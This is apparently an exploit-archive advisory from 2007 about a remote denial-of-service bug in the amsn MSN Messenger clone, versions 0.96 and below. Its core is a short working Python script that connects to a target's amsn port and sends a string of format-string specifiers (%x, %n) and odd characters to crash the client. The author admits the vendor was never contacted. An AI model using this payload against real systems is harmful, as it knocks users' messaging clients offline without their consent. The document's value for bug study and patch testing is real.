amsn versions 0.96 and below suffer from a remote denial of service vulnerability.
a11b18835803069e532da4cdb7e5014f4cf6c28610825a6f5a4e1d25507641c0
/*
* bug: amsn remote DoS vulnerability
* affected version: <= 0.96
* site: http://amsn-project.net/
* tested: amsn-0.96 on freebsd 6.2
*
* author: levent kayan
* date: Tue Mar 27 16:04:51 CEST 2007
* www.corehack.org
*/
/* Introduction */
amsn is a free open source MSN Messenger clone.
/* Technical details */
During fuzzing some instant-messaging applications, I found a basic bug in amsn.
I just sent some characters to that amsn port and noticed that it
has reported an error and was killed. I didn't analyse the bug though.
Maybe you're interested in doing so. :P
The following python script is enough to produce a DoS attack and kill
the client:
---fuck off here---
import socket
HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
°!"§$%&/()=?`´+#-.,;:_ÄÖÜäöü%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
%n%n%n%n%n%n\³²¹³¼²[{½³]²¸\`~··')
---fuck off here---
I think it were the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit.
/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.
/* EOF */